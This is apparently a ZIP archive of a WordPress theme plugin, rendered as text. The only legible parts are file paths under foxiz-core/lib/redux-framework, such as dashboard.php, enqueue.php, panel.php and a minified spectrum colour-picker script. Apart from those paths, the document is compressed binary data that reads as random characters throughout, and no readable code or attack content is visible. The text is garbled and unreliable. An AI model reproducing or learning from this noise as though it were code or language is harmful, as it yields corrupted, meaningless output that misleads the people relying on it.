Yx(p04nړ+eY\amx$4>=Y4>:yD4X$6,_ eb`lB~ E|ewz*H|Ls~[. N.5&N.Qn0笹{3PO4ݹL=i_t3*օK__.=fv@dzZ@Н w&Fѝ.)ΧeOs-؅cw`gt1x6;0G@7#%fS]Um.uc">gi%"RSFP6 Th%Pc"ƞ֟(8[KCk.nj MҞl<$9BH uvp+qrUyq`,>М:)e74 2|qF]M =A.w/k,#i* 0X fs99yd'u#{l#~d1^Kbf<6KuWbN-EcjtĢ3NN^Rā=垝X 1-ӫ $C+6=A@fht2qT&HE$SG@b{?/ &5ؚ,1<:vKĘy y2 ԦQ%O\^l8{2*3vNOS',X|?T+NfKTB$[aՋ$f_>uU)Ov\ɡrBOݴOJR}|$N*c~jK4^I.)>fbN,MgU888عkfyդ( vL\]K&1Z[")R5U ;FK7p:9|4!sd;|m4a2G'Ns"y4>:1UF/OYWgd,Q,*ertWi.&fy\Ncuz`Sdvd $gBFnBR ?0[ӰS#;fD)I oĒ>PJ̔'lx`6'o#RX6.g%^\fJ,W(!ѡ۴/3$(1oY\'ڮݧu9qWb4֭Egteq+-p||jI_IUޓã񡕬o|2zt`.s0~xld*f~29zdU Ћ,O($VJ Ks8Qckܲ4+[D02Ɂe4D'2:jN1SM,1{Gw|伥A6+XrtqJЖ*S3Rq}=>R w=` @#/:/ @^.G%ga|e2"WHpX,7@0xl>&/M(>)(Hz\Z_ĺَ7U/Ř\%uJwvcɜ҉ew-P4{:`&gP.@( ї{E6s (^eſʊEP;QǑxӛ6/(RuUlnMjͯK੉09xs#;.g1^FH]`#fU@D [\Oya(P9gΫ:/IJ{#DKG6I#$Ӻ/U?Ot`f+?zbs݁"Vn•| ~ c֧Vץ-c18 r$22*qthfKlmbH>+gxL'@T.0")a)H/x9/O PiWrz\ tT<9mPq;ƞkM}*KSM]Ss0Hu) vS JdP"ɧjFM`" m!Ɋ"W,(>M.YBz m e ~*ZDC߼޾k/?矓Ϟvߵ 3_w?-?=C{w2x0sOi(j^xY=)W߭*qq 7Gۏ߽|EO0A.YqKݷh+Yj1'1 {&5 Bئ8b~^xo4Xb9]EUPPU^~͛}W>搚矫stZ?=H]O*QNT1f5YFPxs`M/cɹ˗̌a,2X͸ީD~sxƆ;OY~EJ<'_w6THMp+7d@yV'mjS UD!xPI8қUR4G!5gàu p~13#xaäCT Q[HD)׵>=[\up 7WYA *5.-&c B!A:AJtGLZK~[gExӑaϫޖΡqV(%P|cͲI%/Ηb'<&Njf2$-g E  ~Wb?VO8.j%ol+5o%Slioy`zju7>,4Su:ƹGs-UOȷ͔%LR]?.{`38[~kX4NtɍXdT&q?%cAkg)"/gȝk(6 aZiK*y&cf+kleM 2r#k~gp΀H㔝sԯjMxt3:~Iq݃W4w˥\a0}q%u7r 2cFڝzm0mfԴ4>H | CR PKYRřU#]Nfoxiz-core/lib/redux-framework/assets/js/vendor/spectrum/redux-spectrum.min.js[k{H+Жq23#q8:o$rPbYb61o?ou ɇMU}[rs4*#=ɿI"qw' ȻQ$qy_~?s!5I08+GL?a߼y^bTn#a0g(H(=4*I)ZyŰg^OѴ#xg*N1nO c׺sK^Eϳ;+~4nkqJMA O 鐋CމF1% (Ihx'Wfs+r-G"JԄ?X!AԄN`pϞueS; vڤx F1 XۜnWyϺVڪmXП`m\ײx$5]]pa0za<t=rBjҍaH=}! |dߤ-pmʷkʭɥn3>ˑ{#LžU6k@VyTDc_,1﴿Z68:ׂ+kv+rtboSt=hoY|3VP"КeS䦣Vׂ0p[bIϻ|k8uQז?@ rתTVkg԰ {RoYȚ2ȁ &#TrSOAtHxePh-}ql yw[d(riT 5KLXSĔ K9rr&X+'Xr ƄrR{Gv;r)IJXZWTnB6A ;RR92RE0\/b)Hxu|n C|Ny>Gޮv}p+w#dw|U.Ш%@T|x!Fy/$Ek_I?S!y'Ӷ3Q3 5z +. u@ql|]Ի?k Jky@G}&:թ&L;vԶr&y\{ضǎTb[}&1mC铗>N,CCu-.>2&ϧT1IUGnjb! v%̓B#40:E3!$g18rwG+燪@J;pj!z,qyVz>$; _,-!w[md&p?kҮL7ݒ>`ڮUm,3f UUEs :R\h87Jy'b1{ s;EQr2sj[ٲ,Eqz""7#Graû|"H>z%=y/`*TLdApה)7lr<W\k^ m*`iE!k9Wl7l>_flY> )ʑ_||,Wߢb="Fv | D+U~Xq2dW4)N F rCL6| {-mҼr}U]~$^MaA fn1`Nx_ӭi ?eͬ]B^]c˅>kAe¸\)Exۗ4g:ea٠jrw_R$VK֒ 4ax 4{AF"s9G{@-*-.X}cxũ*\eqq dƇ5A&U%:VXG⌨ɒ>q5#G UϢ;orWWXY|mS7 fc1Y Ibl>?-MbFUvjowz-M2}ơj`sX3,<}龜|Qa'VdjHX$(7THs[͚o܏#}7qOe꾑w8:`v:~R6b1ee7Fl׷/|zM4 lL&ˌ!C u'sbUA+ ˠW x]2Iä2֔Ħ6q4߿ MΒI%}'D-Ȳo*u|TfyzVՏ idjm%13S|sKȘ' Ro2P@w\M\] _W=ĵZ)Z)UoX,y_2)?煯Y㣸>+| b+h|[=wO[!J{F2@jnUo뷭%Df;z|bZhlII>~. <ͮ-q<;-V<8ÓEGq elVsjn]qR K^y`&`uXnp}-^mn%\>\zVgޗ<;12;|˿HpG !<;ĨM>e]d›|V:$dN~]^K9c #$q%a&&fZx&90k7>m{8,=^!|/;h7x6ԶMhGl`} ̊u"oq"j$+s*pR#';e1d[, oIV~1kj %rsuqCGO/,dGY%4j.uG t7T<LV2!#X OI<Ǿ90wwLJT:7!S@| aܳ[?BɎ|ڟa^F?eLzR!v.i>r>cCaGct9vA fՁ aYl-俊/S16kgapOd%d"<ڹ& JL>8}~ f_+s#XIz唎ٹΎ1sUߌ7@#9|La{iϋ'7/޷n-ך[K 1o lump8xS] \ASd`%vgWR;fb݇\v= 4(mk_)KϘ?/C _Tl&ATSs %{3N̻@չHS>lwcNp&r_=2Q߀_q07AcsSQ gijUfpfʭ*)@3f/R9D32OL0ٕT /wNN0k]oT'u?{Ils*#b3cr&oOabs&ʤ%G/|o9lH>߭ DE- 8|)Ee%iBщ*klFZEA,uUy9gxO8|5ٸ{ 8~l}U-K$ dQLg2aw@;8۽?Zf~O=CQQ ˸ݢ<4Eo57A= 1+1ZҬn}Iӥ442kS]rDkub7]UH2:N,Mj]vɸif<:V_>`Tc=Fo}~>ٻտ0Ihh j#ozN/ui/!6r S`L[8;0*Ӆ> Vȋ_|W8Rf%!pDm|\)s&.q;rυaOw)fS6H`ǣ%{$M4O*~Pr9E\cce@)}zϰV׶v}\Co(̓]'讪5eJ6x3vj!S2`@ acgycmn]ّb9d[Coڻ~茓PeH>JvI~do۽i2  @<`+\˪Ml@ i]Z#^ 6x蜖eR6kG;1=\8b3\03O5oo`Hg ,`  Ie̮NP6K(L0k\H<.G%%+T$$f!p=:X dW"Xx%}G7:Oylqw{#mjGܾ{2$؂HA8W?Wn16^A5֎İk\lbT*A|ݎUs9~d*SQהfה86#a +}ED|"A^XЮZ0R ]0 +$$!҉d-6fl|M%pV}i k:BRj R [2!CCsСC y|^p$dMh"2?JgM;PyP(zhR8P%d8Kٹ-բvRqѿ7;v9xJ+i+ϩ {%- ʷ7g앟c"ǣnV %]`)]\ Q1^Э Т ?"(" :wBĄ(*l쳅D7.R`P=C/M:ha@5wG-}!-K&N[6}GDG+dt3ik?" G)*EXSCuc,1RwW8oLmŨ$l\k?NnE*ۮ!lvhy XZ'W7%Dh\08Vrdj[׆h% }cb0K{iƋc8?)<"!;#'E.($VY܈ɂvzfėӓfP\]\(:2n,!ЮZ](KŹl"-3X}OqEy9ɒ,d]7WL#6z⌂⸡Oʸ5wKU|3/lG՝jX sAaߖ0' 9y"8{-0Y!0X9m&TMTXۿjGH1 L^C C}YemCQwnM @q|3^ 5ߴkDZlN|$7؆Ǖ~»~堶c58^,Bj=uIzȒg{}f\c 2Kr4-8$"X?2x,ĒIvBs pUCdb⓻殥nҌ-oQVxà0k A-V KUnziFq+30ڀ~ ÷ѯ7)+7;A:t9W_AQSTEeO^:䣷F]إYۻYе1A%BTA,,8}Yk#nCWXzꧽ)}?H s}E6]7r_,8?Kx7(`+U=v8h36͎ȩb `$bw1}3lM7wVZ$j칮t IzH[+ ƛ4v0p GƽF7jNaRW&!wYƒjBQ0g,>7b8 g5 O[Eg*|p8P' 24ʬ:*#!fAf  EWi.WAznVet Za!Բ˸vxBٓ³'gt,G![(|=[(xg>^__E108DWqj5]#І+& 8)<naj_e]eV7 is6S4spd|(v\ q`cq`%7˧.%+Bb &)`!)',|*Zԛg%Q  Q !x%=`.p5X=`9 &ȇzZ0e,PpuZoQŎ+ibDEݛn󱟦&x&B u2|̘q$ U _Jf3M%~>#0?ě̓`J]<'|)*2o2Wi{&!Ίgr0_&VZ<> QT*isxi*I~PI)YjZԨJ 5x,)xМ ]Ŕ %_;]k3̝ `0O*+XEftJ HZBt2wyBxadxmTͧ~ 4'uM .s50˾aY@]+$ +gFNZ6m,u.4o".MaŴܒ H[ H`g&k- g);ho&p~ RbHtq︄N{n>)`٘dPa59R[*jd'TY>>Hr$sz&aڻ$l:EIf+` 2,^R4ϼ޻Yw\^vvYMfH"|MC"z|UZ>hc=MuDiʚUl~;'T{5TjH +,_K;u]K@I}[ٔPIQg ȗI '9T:`[^U^[,y}b`<nMÁȠvA|de1R f<cRy8Y}\ '׮hj{5[\c+ M?.6XE^_coYP{XBwr7xďW=\jm&gYFυ:+ueiE  `(AG㶳USZ`E5V1~YkLmkt;wf/Ǟn,: S 6ӐuSe) ]cw5qt/kl3'`ZX38韔59}n(A;z!/-g~q~}PKkT$foxiz-core/lib/redux-framework/core/PKReR1foxiz-core/lib/redux-framework/core/dashboard.phpTj0}W%pmH獽%MFG[TF(BX,t5{%I)`#tѹؾRhD\ɌDpRׇW?/`|YXm}O>K vsLTLGW!*<u@#vUZ$eRTMDiQb|$kdN3t2iB LH+x`ze~zx"l;k A]h+'Ǵfsi&8~Udt6m,gū@ Sr'jsd;vH.3ߠOf(KƩww1xHsE˿:?\4z{K*Ũa ^a9_!V$ 6]RU$< %{-tsy|8I( %}>4E3x7b4͏o"]̍m Xq`^PKYR=! [/foxiz-core/lib/redux-framework/core/enqueue.php\msܶ_k4ɑHۙ]uvԎx88wG2 (Yu߻|ѝnX$y$Ê>v‹yhy>q}_!ЯowVT9i)qF7Eq#k޲'"' 8ic#O ,\oݫTCȹO4$1}tШ^ {)Qf;2X f]bۦS@~&!_#bhZ\H>cvUѿ۷vWm89΂ 4f+C-@@`о¶2>,^D$9NNe0r2,Q4 1Z4amhwnᬿNSḄO],߯c tci/prXeoDt||Ƙ!3J| X+/QAJ@ElEnPLHx4h暗;6^JS,3!iKu-trmk{&U c]/GZct]3dmGζa]lf8wRem EU{.2;4/C}"5`4[N[esi+{`}gXe!I_ vߤw8Q&"ډ6ŖU9jV!5oIGpNl&$)Ve]a2~M$Q! %+ ]&2"8$kyϋ< Vc髍đEƭΥdIs/1fٻߡ^=rEGo_9k-]SqTC|mXCEs\:]QŻ;C3 %I|c[RhFi‾XSmv>Z;*$ﳼp,tB1g}e8E[DD)>΅rZ|xAHm_}PT=φ5h(.o*լ-jg63[6Yvnр~!F4Fsʈȸwք8gXm) .OV׃24y1Z>HfhooHa1uCZ9#[%W%Hp)gXBH9r!urCuH@dRSB$tjB|FZn5H XTb؉/Xjj&-[h:hw)ݦmp T<@d^84 `sGIkHO=2+[y&UƮVXI("/zRIr^t?w *2T,eW= l'B[!nVw!*zY }¡P)Q.f*BOa :Z.=Զ59c9/I`X+/'qq'^VDFuF:@k;A]hIE . 6 ׼j\v2N5\H$spF+E6A{Qf(ńAu`E:+ٚ8Sjq`EhXʿu-{nj(/Y`@UZzdT z 6 +cgpzr >*ѣuM.sh5!R4jF(KIXUQV4 2eIJXdH)r\\(WRRuJ%p5D1ܨ&&AemC\Lc&#UiOLŃMֈ󩁹(]<6$ GJec~&3m=DƒR"Wbn}9-'ߜ F&=qunv[h »ow|^h%p$,eOCG!@Ķ5t~^\8Yo+؍ . cL%ikR^S,J2uɰ2.nl- f5ܖ4 k"Ym|=[odtK~`9Ek-.mA&a +2؜$|%3jBYM2IHBžٞX] #E2WnӾvxݓ}Q2Ǒ]XLSBC%+;}Y5|"K%xd!/`aoB 5.蛏l15 z 1 `a["y_nEK4?5_x}ܷ1TmB/oԆ(:̺mىR6fƬnc&q,X}]wy.>õJj^gI$֐Wiz>E4$xF ?Q$,SX. Iȑ( XltOUa"H< #Q ɫH=KA2KCmA%XӋ FY^c%.ȆS"NePU5k-{wCyyi52]{\_#~K~/jzzM7R9&8/1qe?+trKe0%TMoY DCTٜUX(Fɴ>"7^8\ 3Q2*9<3$v]OYԁN(Ix@ y j# xw8h*5PztY2^du۷xu;ڻ F*pY=~ X^0U2+ y}= T%'z|הiEJ]f{PfVI@8'X ).`} Q pU,5f^Sd5l x)y;;(>ƪk;.F vE$b\hf1U|˗APu$? h:"GYi.݂Ej->)H +7i(e_4?;4ǀ~;x;ww>!!a)p\بѦ!vFO;͓qN0\.1lO8U)]ۖ0ʊ|({*g+ 76!R>ZZ׎v̹^4(g'@ ߴ؀ɍ! AuؚA|׭s JHi zAIJ)KMƟ$J~^ʢ ܶЭLjAhoߴ6s2h2S>>+*גuzbtm.u[]g+&ɲ0jOuRjWkwQt?m"2ЕxYQf}q0YBӿؼxu9;YȜݷ`B2LO:3O2O}rS|+vf8qmNSg`_ڹ3l/(+:`A,)29A3m;(0 cv ~r~= PKYR1y 9-foxiz-core/lib/redux-framework/core/panel.php[moF_1Xҵ֗H-Ĺ+ VJڄ"ݥ_f%E9v+nɝgvf9\|8NSHB<=߯__}9'߯$cJxWi%O _gDO֟)<;qZN6ȶHՆIȫ,ۻ1^VL$pR2s f`QZ|92c%ӫ9 bQH9vYq͵`f-d6ߘ\B!a#,DU HX~]D"1h ^C)C'E:}Zɞ38+3Ds\yIoo3I\E$i׺o){b y"jjT;9twLb~ރas-Я"o%`>mq+ev[O JR:Qvel| }9Jn;%HA{Ep6)x6vH M >ВmQiLtM&'Q![^;QSCwVv##Ht}TA%7y*0 D qP#1_bBZ4L2+,2bK=pJ5e!l^ yDf3/@ X<pC+T!̸)N5+;chBn dIbyܣG>??~XK~\>Szb?h[] ӱt_g{`A~ZSg^zooefB䫩PqCɊ|ig|b_#̈3%е_+7q31mqlJL%聇Լ{^lNJiUFYr)򑮹< :RUڑ*U2xmnMz[;M}"B>Ch0쾑6/L}c]e互4ː5HYjOlrkcH6vl/2Q I"ӽ{(X>`(m(fa.5 U.m#>4BntT(jLӬg=v\EED#e{Vi$WUF]FPdg,. Sd})8yorKY+J9 M& }jjB!LWo^<\GrA/!4NT5!el.ɏ"ApvJjǿSSlaEr]8+ rC3)aAjzUe~TAMmjnTIJ* U ѨJ̢<qM9bZP1?{+BѵBjJ^{oM`)6X]7XGsP|~>zjh zDg) ПZaV_Xk|6vkS}ؚUE5l p_PKYR0foxiz-core/lib/redux-framework/core/required.phpeP[k ~_qZ&{vtm ƴB }P>ӳ=YE/e?dz'Lg:R!/Ƚgӭ&Nj˿i*͎èT;DZwh`L탋"@]TIնXmn]|V|z]GbDms:F-?Jz160eha3=7OKh1SNPKBjT,/a2,foxiz-core/lib/redux-framework/framework.php=s6ߧ`<~]'^'ӻWNNN:} WJ(yww?$v3-  ?/ '/{®EP|d2$cdL&Y8d`>Y&PY8-rœ88H2Lp6{"cB\dKɒ={-b](Kria@0LP{I}kH, "Yg Ƅr0qx0TBY &`o\e???|@ ]LÐ2k`ywv}_=^^ܰW]_ߞ{|ͮ__]ޜM؍@ ,3XQ^}Ia(46o'|$3 ~`ZMq1IAPɃ.ǔw|.Wx6N`e/@k|q>/&!#bB{{ K!"s_~ĥVXOi~V ۑ;jV5'YkFeltV{PI ombaޞ]ܞ_^ӳnڵWbivi)Z69dGѤvK~c#Yioa4G8@ŚT#R]ѷOwmVڃXY4 lH·J=V:M *o^(4*!' ߚZx$>Spګ/hrd(yxů`_|gf[c AiL/`҈Ì_&:רvYj;,*Fp~jEY S5ZQL;q< Υ$wVd#(incx (˒C }_,Fkт?[aF%}ey"ʥQwxSHN),קtg|N [XmXBxNhɕ&!X C(yS=kj`IiusǵRVXqnj ρJO[}>ROt;`N4KPv"Oܮf>a,3J9 5ɂ1^>,g"k\:lυ>mF5< BƙY+[!?YãH[>{4*@Ltdq@obe7a]80xQ85x!)Y@G¡w B T4Z1FoGNyźɜr|Os8AV\=zv/wYxE2#=bNnřYH,l`xPsXM/eSK3qU+ߪ3^)2x,)A=hcĽLၽ|CmSGtv amB_ 5Vnh ׅ#>U(࿁/T,O |PV]SSQǎtfܩֱ+kc;~6We++dh*j~5V^Dm 猣#._θ ?Lp]lhȋ,fnq59 e&x`'xOG>T3eI3Jh ԻU_F*ig|=:S95-?&M O+zH\ӅoAXX s,\ѯ6nCDw0J0ưD\\{Nfa&s%IX.Ss#^e lzeQ/(W:~{ZC^۳a~. _x=|m: l4G7ؤV:laNJŭ do2 (VԷ[P(]ȵ+E3&Sbf`?ysaV#*䡆8{@sQ/?5+ r=w#SW(rI KzG &%b/*-}`QD LEz͸[uk}ur"y%+/װ&H(Ai0JDܞHwDw4z043k8!bSiqhưᵮP$ 7#ln1R➝.bg/yS5)׋zZ[>nmN*Zd#%wM(0 mA:vvь2ubJ vu )ݰ9jE ';x? u \294nJӼqs묕T7PݬG>[xL$ss6j ]}dſPq+Ea qcl%BP JPVfhkC%0mr-h϶p*-4X3ZW!{StuPb* ЮvL~a.r dQfN@1WsVחJi_x)o uduaSyk\!ٮ=8ەKlW&+}V}ۇL<=zGu6Cm'?#c^bLShƠˊemŢ 0:l[}٥Tv_έi8G!:e;B9 JCNY.wvoN̛DK5;nǷ.ӄg~  aa0/UWTY}ڙ@ z˨a,r7]QإZ; Mߎ^6+v =]<ObD*\Ai$2uM{J]w`Ȧ|!Q5^ȧw eHسut>92ނ`Ke56l%"܍k:iL5g}̃>- nfDIg[lB^Q2…~P]O$Ki ;K th 4fJ:Uv#,:٭C9ʻBxS?J1FűnޝX7ܮ^AZxDwx3,{ߔװ {vx OaԴL B|~ !uzw`Kc~qs:u\pT#YL'{VNov9d%x B׫7W:#jDI&2M8ukZio0)LH-/q^W)4gyɤQק\c߫L_S {a>!0 AR ŀ/ mg'Qm.a,Z3#: X:X~fx{,/^P/++3 d•n]xDUCsOvX7~<˫acsR)ѿ4aV M%IQ2g4 LJ?AQfYm~|]^zR-cQ_LL#ezj- S+pv#vX~ywe Þm;Z]9j*1(=tjm1h o? U )a_Aѐs`,-m!*>co ~F:CG-$usTWn)2d-]JMAb"JI xk7&;uqۛ6VH,SADBܗ}ZdK&%k|LpN,6P( BPuJ:*i(igc⣙ISƂ`:] #lT|>Z܆nR_: 12ס/[åN`3"`T;(:]#77PdRqNr h3Йyo38s`g ԕbx6D0'7ͷM0LEml+!:Z$] s{* ֛^ey}s*=+ّ*ʈ+̛MߎbO0fTKa%bu'y+5i86zGG،%$XKs=[]⭟xTHAp̫%D{ ԃ&6WG?)M9mfWAjoa2>n'fwӎӐzXRƱSce H3*:4BMqXI(VfKM1jr]^IHj:YV.ӎv&F^[']gn=[8`qG؂]i7s gSST(Au1 =>kb̭` dFnKtСs,7q8ЈTԶ.E?Zcꒂ#N;.tBı3Oo+x xrb 'G$⠪Ťcwj"75Y{o23Osw@LSe O@f=TY8: \.O*̚!k 3vȽj\!6;̲w.aFԻhhDF6?fLGщC0WJDt edKP++"-,>Ch~rr.sIKi)A1T Puu1[)mlׂ+ڞ tË !J=Zo򡅅;]Pt"_GgcgO0e`V}/XG& ˜Uя77t_l#gE(><]#M\D1/::>ܗ=eJ[B%ůƋZ8wZ5JP3ukښ^`׺jԄ8>ջ3prō|m"˜u 3D0؇(~}zLjҦq:GTx Ibޜ>H >H( _25q|][#h57ךgg߽fG7XgH7S'qmpMG`B='QtC^tE\c.{HAG' U31Y2Fv4=![-XymVΠ=dUdY찅(D#O'cQ (E BI%w*>L A[oC(0o-L1cGǽ7#wubbPJ7<媃0:C/8lx]_N~y_vc_HW-'R{ѕS7y&t17IHGڴT,{ߪ) F 4zJ(FϺ*+^LoN; a r="𲶭b/+]Dy8ec΋ RGAg2VV#>\%-b?1ƠEѲSIsܩcmD *܍n$!6j"A ECc~ZGkh k 6"hIњoUz>]Z$rmJ\=1ZuRn'QMKԃESO7M ^)QˮΘَt[&advIDzH? ȯ5m7nj&m+]M G4?۰V@nϿcqU =7 >M?\A" ]rw@q/^wN G_ϳJўXb cX}tM**Ӹi4Ɖ3eʟ1´7 +t&D4 e,VFh=i9#8[3ɰ(}dm]fm5xǾ4ičQ Q WU&WX+ IsW 丼 U / E60CrmspH6A nrI?kCm쪪 }VeȪ6\lIŜ8&:ʐֆzsrz_@Dq62rD5qPK ŐshY)D(׌ Wm~|ֵ?XZ$+5Ȑ'[mb|MƓsؗ[blNQࠈq sR11Tl fN謹f5E"H HsTy> hD*#7ZFb3S8Mճpo Y(*6Y8^µMV Ġ 4hgJYC1!2VPn^hCMU[R%x4ćPq9d]px8E֗>9|QK첨 ?)-kǿꨙ n^K~<{/^eVP&V䯸Ɩ]E"6 d`bzl)N@eS ^NSP:Ɵg(ҩsm?$[6cl*0IJſ{"hANQr`̀讘 |cqMS\7'5H(mKH=a(7ߜ8M8M>-&T0{U BҞ a({:`L|4mDLT AH#=)%)FǮ͒we$,*;:XTle\-SW}b_|uZۇ诜̱~PίE}ri:BqΙVD}mEUSx/у kl] }v,g:¿pH3+Ib`B1i3@6J!M TtzeGoJtn+oEX(SDܱ/8*mQxh'#a;/_1|{Zz0XEYĴs \udvхRJ70IUc$&_ص`,͕?6 &k$CJ& ܲgkDJ~GY|c>h8(") ԎE'${RSd p(z0$-C>_4>xp&ؖ9hs <ÅgPU Fؕږ EY#$go*MzPn058o1BQZSpeq@i Ŕ # [qPD_|j)/;?cphQd9`4.2G5j8vE7 YQh 4%^_=k-Vdt7m)3(w[{'^|$a"t1HCh"ԓp%R/ڸOF>?F.{)K8@Њr]Q>j6Ltk/ p&}t0h|o]GyaQ=oY2,Uz,n 礌 @ܫB1JtE cN[>YE?]PFb$@Qۼ1ğ/U/uFTYU2 ϓeQ~Rߩ֢pjDKrPt[Z8s;uFD |Q!fίu]o"!QJ& 4_0ہۑWPr0Mx7!Ygz 5j$uiJV"k0wQ=!o~ݱZݍ;r.5E-;D(QQy xEX}kQ}4S>؂ W9^b  wJo^ M"ʑ͕2ǷqpT0!EnLt( Iّt85|+Mz׍/u|VQe$;ym%s6_b::*LmլPwq<\a *%:\4ͽek Ek˃S&d$e7|(vi ,Kdt]̙uh7fYZbQݥW.&0:Ӣf̓@d) -*2H@IJ|8Ĕ/#em;Ӽi;E A$f(zj%Py=Pڤ8٢ISFd4Ϛ*#.l5pܬ w-\2(oY_k%|t)Z7?M-&Hd^a~s( L+E|6kGB#Iij~qnd_JCbV1PY#cJw- 8.ה!&a幕 O?O ejsu`o7+G F/ܡ:.JZr£0IOKР ɝ(ІG :Ĺ96ർZ>";KOЅZ>"|; ,ThŸ4Hk5f(Qzswvm70))؀€kÐQRt|=lB6gdyclo!'K+枳i3t e{!:? p&B#|!.RE=}2{GZj"|/cg`,3 7ya!KXZK:otU65.D֗=Ή _@40uk:o7]iSVZ'|2B\G82>Ac6`HPcr އmnगgt#[Y?6rDB G a9dza1!=8y2'X[ [XV=.D,Ԇhr]#ƽIm>cc:ɏ$-j2 i .e.زXsȈd9$ F;̅#6vH,pb6cfxUw@gba)cįA¿gQ^(j ndq$^I-{V]Ci;"ı7hch}VTeAB9a8J/Yy[P;:%ps.<=qՇczsAoIhHc8-ِq/Uuafu:eɘհ !pWB(lVGe틶u>nwhZ;E82gGXqE Fk?lGgeQBo(i:0d\g6f,ҁWMį$wk-$< JD0(M.3rQe ~Bӟ \K4޶\n9$#5Bᅃ FgeH &ۆ7˘_yQ-y6?jѭLwh2o|' _Q 6ԩ(Vļq,uMQteIf$}7r+ƉP8?8x|osf7}oɓhRl؍Ԉ&NNp,#EU;uJW\eݗwbc$w7ĜE,?4N2^v~U]~%.j/P\Qb$v_MqFAEqg$yV Y/)|Ig8v2=*voyb $!48N7O_xiӧ<2[jD8(ؚ]MvMW*##`tˇ99k˙n>Li^fbQԳ:\)ex{vЯO4XL$ #p$K6D ojLx.. x}ۢ4{x]@c~gVx{_mj +;եSݕY>;?.tHŦ|tF+T~S{?"IÓevG[:y6C&tK뼚mlO%t#:rץSISzjoه Q$[̈́Ikm(.))x~%PAXWkzq=Bk߲یc7Hj:5*5Qq*Й+jOI& ^X"/}dZȔ}GmzE l)jYU]Yg!Nߞw^&0J5.>{T?+Ąa? |n'ǫ:_Ь\9SykcRւ>Hx0qN%Ⱥ'/O 'Atwb1H6(J2$#97'2yr69^%e vqvWyE-U}iT7[Bsf$FTu )@US^Ýt'8LlC:A̓VAt5=<8thT&:_R#nS"_ 8c>5G $U4_/ph&vo)˪2ȳ亪nHvLmRh_@cȶ<牐Fñx|CQk~)-S*Ka9)ō1Rerʠߣ#{N54|7/4b>Ʉ+ |@%F/Aez6h=j#?MēivZ}6 Heu+, ,Rfwƶ㛑"GO ^^5"NC}VAll*Ih.oQCnXCɆ`8dU6AI &qNpyͣ P 2eL&t471z`VO0=.rbF(YM w/FcNѱ 颞 S1vK~ ^ Nج`7Fx+466un<^Nai yahޮYq  uzc;Cc[fG6jB)fBtrr~ꚕ^$-n_ pV/y3N{򀃓w$WlșNPȇi6ϙ߉_1Pv%:k<_,[[{Th_o_&]jwk v? ~8ݎhSK1H1rz 4]rKԡ!NƅpopBO$GC܎Y}YALAZ\BRY,3+V>k}! [4a+j)+mUxe5Z?ɱȉSw0] ';?ʹ`ۧU8Y$!'N5{1o쵲t)DVs h+.+Ϝ%W va&}% \<{~vĎhAlQg?$KCp@nʴ\'o_'!-/p]O ¼j"2 :=F%_Х}=dq(##/i 9jήG%k*gi q 6QH{SW0Rn:u ?nSgi g :HLoDo>7#p68 ]N}D9z%x dF8y4N/#-{D^Nf=>ߡo|!$Z4u.je כ8+4@x)%Da*M?x@s$wYYc*NKۼ_I=;tfŖp^&Qc2oLW> "HgV%ʒαm/y~s_EWTd;q= n Y3~4W(xݍɳ³-p @FCBV1᫹30bX,"SH(PE w wa΅@XSϿЬwDSJ /= &pGen?d-E{2D_?ܲ =T{c(|j@Ȅ dv13-Qaij*^fc梨c -oA{1T-ؠr ;$1 $8vM$}(5}Zn[_NSG.U:Ut^Y& 6 _A|4Lժ.9"5'Vs!O6HgxpQZcx-G Y BZ⊷ *-߁U3˫ĥA_OO 1dfO.8P]?FZR,Jؘ3ad eCV6:"ΤBFt$Xk7% ;ОyNr@˦Vl{r0V^眈$ K2ap C5knfё8婿l\D:_7'hTi3nY-R&!j3g3)SFY{>JH8ObEi^;sq'RTE\Eqa{o78>O&;jfgCyS,:Ur(,^UkʕrqOtlZD㳒^/lv~.:_A_NΓ,OokK2.eX*U_s! L{6aA1d)䏹cFljZ'VTh3&1!R,䱫N0󸃦"불/t,A;usȑqA5 &#W )( ׷ޔ߯0}L ީb"繕 ;2?jAL5V hP*u (C sjQ}!"Sdtg,49A1¼r?a_옵g!:Ѓ &L8@DHP@SX7@asy#8BD㰧?LgCK.;6'ֻ&O> dSjڱ[FӑqgN}wɨí,vE+OƱkC[c˸7a~ԥzԎ֎GDϿ)JY0`*R64FQhͲ FBd Px}Ei-T^P$86r[MhBOh]};޸c^jV/w?+iLŰ5^!N'PB fbt |:c4Ljz@+مԅ1^D*!{ZHԲ;s!q 13a@ى׆/I*DqP{tWsՑ%}W3&mʙf-І!4o&݁bJh =$juD-5$A{4Ro'W%r&CX|r%D531ȯ.kso3>"O } >F\ ϱh5j0 q2#r)Q?O;Z#pd_1jB<+IY(}6Pmx͛g [L`ѓ;9~fs%A`=mDygFюM-OYFͺ^UMdn6v@IYebuջWR6:4С{߶GiCh#D&}jNHc,PB(D_"ގK,QfyGSz(b1',; D(BJtI5Ⱦ 7ed^ Eh+u_ Jn_ee~>peG)Q\\ʱ~J)?mdCa%BOVT"'`k}Cf$œ9d\)pM`DZUn["o.:hYDUF1i6YnC~œC2dl2%l^ [OB{E.+mc{ M_lEۢ(b~X%>2&W&r.ѷ&2)yQd$i/OӔ,S6i ejKKż,+aP[U#&G"G* |-ͯivN:WЂgG=#֥B9ܽQMGB-/}f$|1Q ym2(>dOu Ꟛ&3eq栃S Ȩma h!kvmGˆlS:6!b lCy˃ 2"z}`X:~\^xjQAϰ*T9#`Bǧw6>N_F'(h뢭 7Y+Fyiei S'R m')CMBb0k(;myt u/B3{/fJ9lY`tu )PeT Ey [V)DJBF gI3F/p^Peچ oLVi/+)%Z9jxpN&"c9>~kV%k0 N^AFJ_wU[YlRj`~L&L;"e lF7Fx~gBpA|sP\P"Ƞ6C;8>7'qE>>uο02Nc{,/0s)Y<ߒ3;{kw3P=̆l5ͪꦀS[]g<c)Am}ѣGd0 8=}8m)5>18ݕ<,x$PGɅ&Oa\1ߙ?/z41o.onP (Qb^H8^eGbBq'Ps)SoĆ$Q$I܋\cpC ;n3lܚF_?e6 #b3QUԋ:!~/qEez-K~It]m(ɻ'ukdci^gy~:mUSX+㨚CD`tѓNn=ێ}yK7}l2"qsx XhU80Y+Psh@;}ww> 9$OqspaO(]ky_\L2O8XLZr#H?h<[Y>j6$wVT>ׇ)/ cU+ 2 iSMG#CoNgg߽~ YrAqiQʂ=8`jS_>Nm8ZΔq;t5euP4>0G{nM Ā`XV2[D1aU8l)ڻzj$\u쪩ݍs@g`]U4M[?0 q]#}Pf.Ǚ=SwY]b^e.f*0jLNԏmqB"PPSR=N<)INpooFS>vU2 G'fg C?xt_6KQX&?lJ/u{[U{$`>\gƻ%:۱%&_a3 